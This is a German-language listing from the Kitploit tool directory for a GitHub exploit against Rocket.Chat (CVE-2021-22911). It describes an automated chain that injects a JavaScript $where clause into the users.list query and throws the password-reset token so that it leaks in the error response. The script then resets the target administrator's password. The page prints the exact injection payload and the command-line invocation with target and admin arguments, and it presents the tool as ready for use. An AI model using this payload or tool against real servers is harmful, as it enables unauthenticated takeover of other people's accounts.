Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RocketChat-NoSQLi-Chain-CVE-2021-22911 — Automatisierter NoSQL-Injection-Exploit für Rocket.Chat, der Passwort-Zurücksetzungs-Token über die $where-Klausel preisgibt und eine nicht authentifizierte Übernahme von Konten durchführt. | Kitploit
Tools/GitHubGitHub/tenebrae93/rocketchat-nosqli-chain-cve-2021-22911
PasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubtenebrae93/rocketchat-nosqli-chain-cve-2021-22911

RocketChat-NoSQLi-Chain-CVE-2021-22911

Automatisierter NoSQL-Injection-Exploit für Rocket.Chat, der Passwort-Zurücksetzungs-Token über die $where-Klausel preisgibt und eine nicht authentifizierte Übernahme von Konten durchführt.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Rocket.Chat NoSQLi Token-Leak & Passwort-Reset

Ein automatisiertes Exploit-Skript für Rocket.Chat (und Meteor-basierte Anwendungen), das eine NoSQL-Injection über die $where-Klausel ausnutzt, um Passwort-Reset-Tokens durch serverseitige Ausnahmen preiszugeben. Sobald das Token geleakt ist, führt das Skript einen nicht authentifizierten Passwort-Reset durch.

Schwachstellenübersicht

  1. Authentifizierung: Das Skript authentifiziert sich als normaler Benutzer, um Zugriff auf den Endpunkt /api/v1/users.list zu erhalten.

  2. NoSQL-Injection: Es verwendet den query-Parameter, um eine $where-JavaScript-Klausel zu injizieren.

  3. Datenextraktion: Durch die Verwendung der throw-Anweisung innerhalb der Injection wird der Server gezwungen, einen Fehler vom Typ "uncaught exception" zurückzugeben, der das Passwort-Reset-Token des Zielbenutzers enthält.

  4. Kontoübernahme: Das Skript verwendet das geleakte Token, um resetPassword aufzurufen und das Passwort des Zielkontos zu ändern.

Verwendung

Voraussetzungen

  • Python 3.x

  • requests-Bibliothek

Bash

root@kitploit:~
pip install requests

Ausführung

Bash

root@kitploit:~
python3 exploit.py --url http://<TARGET_IP>:3000\
                   -u <YOUR_USER>\
                   -p <YOUR_PASS>\
                   -a <TARGET_ADMIN_USER>\
                   -ap <NEW_ADMIN_PASSWORD>

Befehlszeilenargumente

Exploit-Kette im Detail

Der Kern des Exploits ist die Injection-Zeichenfolge:

JavaScript

root@kitploit:~
{"$where":"this.username==='admin' && (()=>{ throw this.services.password.reset.token })()"}

Wenn sie vom Server verarbeitet wird, führt die Datenbank-Engine die anonyme Funktion aus, stürzt beim throw ab, und die Anwendung fängt die Ausnahme ab, wobei sie unbeabsichtigt das geheime Token im JSON-Fehlerresponse an den Benutzer weitergibt.

Tool herunterladen
ArgumentLong FlagBeschreibung
-u--userIhr gültiger Benutzername oder Ihre E-Mail für die erste Authentifizierung.
-p--passwordIhr gültiges Passwort.
-a--adminDer Benutzername des Kontos, das Sie zurücksetzen möchten.
-ap--admin-passDas neue Passwort, das für das Administratorkonto festgelegt werden soll.
--urlDie Basis-URL der Rocket.Chat-Instanz.